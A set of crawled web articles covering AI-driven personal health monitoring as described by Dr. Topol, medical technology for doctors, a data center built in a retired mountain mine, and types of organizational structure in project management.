Another topic Dr. Topol discussed about the role of artificial intelligence in healthcare was giving every person more insight and control on their own health. This is one of the areas where deep learning algorithms have made great inroads.
Less visits to the doctor
Thanks to innovations happening in the field of internet of things (IoT) and wearables, there are plenty of tools that patients can carry around with them and regularly collect vital signs and other health-related data. This information can then be fed into neural networks, which will then draw pertinent insights and conclusions.
For patients, it might mean that they will need less visits to the doctor.
“For the patients, AI gives them more charge to let them do many things that are common diagnoses, without the need for a doctor, and also tracking their own data that they generate, to guide their help.
There are now many personal health devices that can collect important data at short intervals and run them by AI algorithms to obtain important information about patients’ health without the need to visit a doctor. Complementing that are several AI-powered health assistants that provide users with basic-but-effective diagnosis that would have otherwise required going to a clinic and waiting for your turn.
The AI-powered virtual medical coach
But the future is broad health support, Dr. Topol envisions. So, for instance, if you’re at risk for a condition known from your genome such as a heart disease, then AI-powered health care devices will accrue all your data that moment to moment seamlessly and feed it into a deep learning algorithm that has been tailored to your health condition. The AI will also improve its performance with up-to-date world medical literature and data that is relevant to your condition.
“The AI has everything about your prior medical history, your labs, your scans, your genome, sensors you’re wearing, your environmental sensors, medical literature. All this data is just continually being assessed to give you feedback, whether that’s through an avatar or speech or text, you can pick that,” Dr. Topol says.
For the moment, AI assistance exists for limited conditions, like managing diabetes. But as the technology develops, it will expand to other areas as the pieces come together. As data collection and analysis becomes easier and more affordable, AI algorithms will be able to train on deep data about thousands and millions of patients and provide the best advice and coaching.
“The way it works today is there’s this one-off appointment with the doctor. In the future, you will have a coach that is with you all the time as long as you want to have this coaching operation,” Dr. Topol says. “We have this unique capability of bringing in massive amounts of data about a given individual, and processing the data with AI algorithms and giving feedback, and that is another way to decompress the role of the doctor whereby the person who is getting this feedback could contact this doctor when there’s need. The virtual medical coach is starting to get legs. Eventually it will be a way, a path to prevention, which is fulfilling a dream we never really actualized before.”
Who will own health data?
The privacy implications of data-hungry AI algorithms are already being widely discussed by scientists and thought leaders. Who will own the massive data that patients generate? Will we be able to trust large tech companies with our health profiles? If not, should governments take care of them? There are many ways any of those scenarios can turn into privacy disasters, especially as AI algorithms become increasingly efficient at influencing people in inconspicuous ways.
For the moment, patient data is scattered across the archives of different hospitals and health organizations and the servers of tech companies. There’s no single store where patients can access their data.
Dr. Topol believes that in the future, data will belong exclusively to the patient, a point he expands on in Deep Medicine. “Undoubtedly, there’s going to be progressive democratization. Once the data is imminently portable, you can’t withhold it from people. People should own their data,” he says. “There is no home today for owing data, only parts of it are in electronic records, and even that’s dispersed quite widely. When you’re generating data, more and more people are going to be using medicalized sensors, wearable biosensors, and you will have our genome assessed and gut microbiome assessed, and all these other data—they don’t sit anywhere.”
In addition to the privacy implications of patient data being at the mercy of other entities, the scattered structure of health data makes it hard to train efficient AI algorithms. “If you have all your data, you can use it as input for any deep learning, AI algorithm. Today, no one has all that data properly aggregated. So if you don’t have good input, you’re not going to have good output from AI algorithms,” Dr. Topol remarks.
The perils of having too much health data
While we explore the benefits of data- and AI-driven self-care, we must also discover the possible negative effects too much exposure to health data. Studies show that tracking symptoms too closely can have an adverse effect on the health of patients, creating a feedback loop in which seeing negative symptoms lead to anxiety, which further affects the symptoms, and so on.
Dr. Topol acknowledges that collecting data at high frequency and returning it to the patient can make things worse by generating false positives and causing anxiety. That’s why there’s no one-size-fits-all approach that everyone should adopt.
“It has to be used in a very special, specific way, for the right person, at the right time, rather than just broadly distributed or marketed,” Dr. Topol warns.
As an example, Dr. Topol mentions the Apple Watch 4, which has a built-in functionality that uses AI to detect atrial fibrillation, a disease that causes abnormal heart rhythms and can lead to severe heart failures. There have been several cases where Apple Watch 4 has been able to save the lives of patients by detecting early symptoms. But studies also show that it can show false positives for the people who don’t have heart problems.
“Apple Watch is being marketed as a way to monitor your heart rhythm for everyone. That’s not good, because most people, especially people who are young, less than age 50, their risk of having atrial fibrillation is exceptionally low,” Dr. Topol says, adding that the feature can cause a false alarm, pushing the user down a tunnel that could wind up with all sorts of negative things.
“So what we have are great powerful tools that have to be applied with great discrimination, that is with very careful, judicious use, which isn’t likely to happen by accident. It’s going to take a lot of work,” Dr. Topol says.
|
<urn:uuid:3258c512-2476-42bc-97ca-d4aa4ab50a49>
|
CC-MAIN-2022-40
|
https://bdtechtalks.com/2019/09/04/deep-medicine-ai-self-care/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00447.warc.gz
|
en
| 0.954251 | 1,597 | 2.609375 | 3 |
Doctors naturally want to improve their services to patients, and technology is now giving them the ability to extend their reach and improve their quality of care. From telemedicine to the internet of things (IoT) and 3D-printed medication, we look at the top tech items doctors are eager for this Christmas.
The IoT comes to healthcare
The IoT has been making waves in virtually every industry. As the name implies, the IoT is comprised of Wi-Fi-enabled devices, or ‘things’, connected via the internet. Doctors can now make use of IoT devices to help them treat their patients’ problems in real-time. The list of possible benefits is considerable.
Firstly, IoT devices enable doctors to monitor a patient’s health at a distance. Individual doctors and hospitals no longer have to ask patients to come to them to monitor their health, meaning more healthcare and specialty medical services can be made available to those in remote areas.
Telehealth is becoming a reality
Doctors understand that some patients find it difficult to visit them at their offices or are unable to visit a hospital for a check-up. One viable solution is telemedicine – where healthcare professionals consult with their patients in real-time over the internet using video chat software.
Thanks to advances in IoT, telemedicine is taking one step further and allowing doctors to give patients health check-ups remotely using internet-enabled wearable technology. A patient with a wearable device, such as a smartwatch, can aid the doctor in diagnosing and treating illnesses by relaying information such as their heart rate and blood pressure.
Many types of medication are designed for general use and, as such, their dosages may not be right for some people. This is where 3D printing can assist, allowing manufacturers to custom-make medication for individual needs.
3D-printing technology is now becoming inexpensive enough to be applied to medication manufacturing. In addition to being able to produce a single pill at the right dosage for a specific patient, different drugs can be combined in a single tablet for patients who require several types of medication.
These are just a few of the tech items that are sitting high on doctors’ Christmas wish lists this year. As the associated technology improves, these healthcare solutions will hopefully become more readily available to doctors and medical organizations alike.
|
<urn:uuid:508fd47d-3783-423f-b1a5-23a3f49f62e3>
|
CC-MAIN-2022-40
|
https://gulfsouthtech.com/uncategorized/what-tech-items-top-the-doctors-christmas-wish-lists/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00447.warc.gz
|
en
| 0.960182 | 484 | 2.515625 | 3 |
Companies are building data centers in places you’d least expect. We’ve heard of Microsoft’s underwater data center and Kolos’ Arctic data center. And just when we thought this was the limit, ABB just helped create an underground data center in Europe.
This data center is special because it is situated in a retired mine. It is 150 meters into the side of a mountain in Lefdal. But why the side of a mountain? Well, it turns out that an abandoned mountainside mine has almost everything a data center would need.
The Mountain Side Offers Better Cooling
A data center uses a lot of power. It needs the power to run its high-density server stacks. There is need for power to operate the air conditioning that keeps computers cool and working efficiently. A mountainside has temperatures that are lower and more stable than other areas.
Thanks to its location in the mountainside, the data center has access to water that it uses for cooling. As such, the server containers can run up to 50 kW of power, which is more than the 7-8kW you would expect with traditional air cooling.
Image of an abandoned mine
In addition to the lower temperatures on the mountainside, ABB, which helped build the facility, took the data center’s cooling to whole new level by using glacial water from a nearby fjord.
Additionally, the data center is located below the fjord’s water level. This eliminates the need for high-capacity pumps that would otherwise be required to pump water uphill to get to the data center’s heat exchangers.
A Mine is Highly Secure, and So is the Data Center
The data center is located in a mine, making it extremely safe. Governments protect mines because if not well taken care of, mines could cause serious environmental damage. Besides, mines make a lot of money for governments from the sale of natural resources.
Leveraging Assets in the Local Environment
The fact that the data center is located in a mine means that it can use the existing infrastructure to cater for its power needs. For its base electricity needs, the data center turned to ABB to create a robust medium-voltage backbone.
For extra redundancy, ABB also integrated renewable energy sources in the surroundings.
Picture of a windfarm for renewable energy
A data center needs a stable source of power, particularly during the startup phase. This data center currently runs on 10MW. When its nears full capacity in future, the data center will need around 200MW.
ABB constructed the power infrastructure that will support the data center’s growth over the next couple of years. For example, ABB connected the data center to four glacier-powered hydropower stations and two wind farms.
How Redundancy is Guaranteed
To ensure that the data center’s resilience, ABB installed a decentralized uninterruptible power system (UPS). With the UPS, each block in the data center has its own independent power supply.
In case of a blackout, the UPS powers up in a matter of milliseconds. This ensures that the servers keep running until backup generators intervene.
What the Future Holds for the Data Center
ABB takes a lot of pride for being part of this innovative project. In today’s world, energy efficiency in data centers is not just a desire, but a need. What ABB has accomplished opens doors for many other innovative ideas with regards to data center location.
The data center has around 120,000 square meters of white space that is integrated into the retired mine. This space will be filled out by containers supplied by Rittal. Then, these containers will be converted into server homes.
|
<urn:uuid:5c48b7c7-673e-4e3a-b494-a46549919205>
|
CC-MAIN-2022-40
|
https://www.datacenters.com/news/how-a-mountain-side-retired-mine-is-a-perfect-home-for-a-data-center
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00447.warc.gz
|
en
| 0.944153 | 770 | 3.078125 | 3 |
8 Common Types of Organizational Structures in Project Management
An organizational structure is a standard hierarchy of operations. It defines how you can divide, coordinate, and direct groups. More so, it defines the positions and describes the tasks required to achieve an organization’s objectives and vision.
Organizational structures aren’t set in stone and are tweaked as per the organization’s size, needs, and their philosophy. In this article, you'll get to learn the nitty-gritty of different types of organizational structures in project management and how they function.
You may also like: PMP Certification: A Step-by-step Guide for Beginners in 2021
Features and Types of Organizational Structure
When choosing an organizational structure, certain features shouldn't be overlooked.
The key elements that contribute to a proper organizational structure are as follows:
- Degree of alignment with organizational objectives
- Accountability assignment
- Delegation of Capabilities
- Simplicity of Design
- Physical locations
1. Organic or Simple Organization
This type of organization is very flexible and able to adapt well to market changes.
This structure is characterized by having few rules, regulations and management layers and a decentralized decision-making layout.
An organic organization's design deals well with a rapidly changing environment. People work side-by-side to communicate quickly and often solving unforeseen problems, issues and requirements.
Here, the project manager has very little or no authority, and may or may not have a designated job role.
2. Line Organization
This is the simplest form of organizational structure that you'll find across small companies. It has well-defined authority levels in the hierarchical structure. Power flows from the top down to different operational levels or workers.
The hierarchical structure clearly defines authority, responsibility, and accountability at each level.
Due to its simplicity, authority and responsibilities are transparent and easily traceable. Communication is fast and easy because employees get quick feedback and respond fast.
The project manager performs duties based on position or authority in the hierarchy. Some organizations don’t have this position, but when they do, they may have little or nothing to do.
3. Line and Staff Organization
The Line and Staff Organization is a modification of the Line Organization. Here, functional specialists work with line managers to guide and advise them.
This structure is more common in the present day, and most of the larger enterprises adopt this type of setup.
The staff consists of two categories; the general and the specialized team.
- General Staff: The general staff consists of ordinary employees that assist the top management. These staff aren’t experts
- Specialized Staff: This team consists of experts that offer services to the organization. Their roles can be advisory, control (as in quality control), or service (such as maintenance). The Line and Staff Organization uses the expertise of specialists. So the line managers become better in several fields.
1) Staff can make quality decisions, get support from specialists, and enjoy better coordination.
2) Get training to enhance skills, get an opportunity to work in research & development.
1) Increased confusion and conflicts among the staff
2) Higher costs on hiring specialist
3) A tendency to develop personal image within the group
4. Functional Organization
The Functional Organization groups workers based on their area of specialization. This structure is an extension of the Line Organization. The functional manager leads the team and manages all the operations or businesses.
The Functional Organization manager enforces directives within a clearly defined scope of authority. This concept originated with Fredrick W. Taylor.
Here you classify workers according to their functional roles and department. Some of the general departments under this are
- Customer service
- Supply Chain, etc.,
The organization's head is the president, followed by the vice president, and the chain goes on. Furthermore, the leaders of departments foresee their departmental performance. So they collectively help the organization control quality and uniformity.
The structure positions departments vertically and disconnected from others. Hence the name “silos.” The department heads manage communication between the top management and his subordinates.
The project manager has a minimal role to play or may not have a designated position. Generally, you'll play the role of an expediter or work as a coordinator. While as a functional manager, you'll deal with
- Budget allocation
- Resource allocation, and
- Decision making
This type of organization is suitable for manufacturing or engineering companies. It supports ongoing operations and practices for producing standard products.
You may also like: 108 Project Management Statistics to Help You Ensure Project Success
5. Divisional Organization
This type of organization often resembles a Functional Organization. The team members work in different departments. This setup splits the employees into segments based on products, markets, or services.
Albeit, the divisional organization's segments or divisions are autonomous. Functional units that support this structure include:
- R & D department, and
- Personnel, etc.
This design focuses on service lines like products, customers, area, and time. Since they operate as small organizations, they're called “self-contained structures.”
So they work independently on divisional goals. But all divisions collectively meet the organizational policies and business objectives.
This type of organization is suitable for companies that
- Operate in different geographical locations,
- Have chain stores with subsidiaries, and
- Banking and insurance business
Here, the project managers may or may not exist or may be hired on temporary assignments.
1) This structure affects the integration of the organization as a whole.
6. Project Organization
Project organization is a temporary setup formed for specific projects. It's also called “projectized organizational structure.” The project manager assigned for the project is the head of this structure.
Once the project is complete, you may choose to dismantle this setup or move it to form a new project. In the case of a new project, the project manager might have to reshuffle the staff to fit the new plan. You’ll hire resources or specialists from different functional departments.
As a project manager, you can use allotted resources until completion and closeout. Albeit you're accountable for all the activities and timely completion of the project. In other words, you must spend based on the project budget.
The manager assigns clearly defined tasks to each of the team members, along with the complete schedule.
These types of organizations are useful when:
- The project scope is complete, and objectives are clearly defined
- The project is unique and independent
7. Matrix Organization
This one is the combination of a projectized and functional organization. This hybrid organization overcomes the limitations of each organization. Here, both the functional and project managers share their respective authorities.
Project managers are generally responsible for
- Overall integration
- Project planning
- Execution of the project, and
- Completion of project activities
All activities must be done using the assigned resources.
The functional managers are concerned with the operational aspects of the project. They’re also responsible for providing technical guidance.
The functional staff specializes in the skills required for the project. Though project managers manage the project staff, functional managers control the process.
This type of organization is most useful when workers must share available resources. The combination achieves high efficiency and better usage of available resources. Also, they adapt better to the changing trends.
You can further classify the Matrix Organization into
- Strong and
The authority level that both functional and project managers share determines its strength.
You may also like: 5 Trends That Are Shaping Project Management Plans in 2021
8. Virtual Organization
A virtual organization is a recent development that involves different locations. When your team executes a project in one area, you can manage it from any other place. So you can distribute resources to your project team regardless of location.
You can connect all the locations virtually. The other names for this organizational structure are:
- Digital organization
- Network organization, or
- Modular organization
ICT (Information and Communication Technology) is the backbone of virtual organizations. This organization is a social network without vertical and horizontal boundaries.
Resources aren't tied to a particular workstation (desk). Also, you can work from any mobile device. You can manage every project activity, including meetings, virtually.
The team reports digitally except on a few occasions that need physical meetings. Hence, it's common to hear of virtual offices, virtual teams, and virtual leadership
This setup is most suitable for software or IT companies.
1) Faster and cost-effective as there are no boundaries to work and communication.
2) Lower operating costs as no permanent set up required (no need for office premises)
3) Have several options like flexitime, part-time work, job-sharing, and home-based working, hence increased
4) Employee satisfaction and efficiency
5) Can have a larger talent pool
1) No physical contact or communication, thus, lacks team integrity
2) Difficult to restrict information sharing as your locations are different
3) You have to spread resources across various locations and time zones
4) Resources require training for virtual interaction
5) Different time zones cause delayed responses
With the different types of organizational structures, it’s easy to know what you need. Though each structure has limitations, large and complex organizations adopt the matrix organization.
Line and staff organization has a direct and straightforward hierarchy. Hence it's used in simple organizations. Software or information technology businesses often adopt virtual organizations.
Albeit choosing the right organization, type ensures that you do well in the market.
|
<urn:uuid:bf4b01ad-e179-4929-af6e-a728a612c3ec>
|
CC-MAIN-2022-40
|
https://www.greycampus.com/blog/project-management/common-types-of-organizational-structures-in-project-management
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00447.warc.gz
|
en
| 0.923776 | 2,034 | 2.8125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.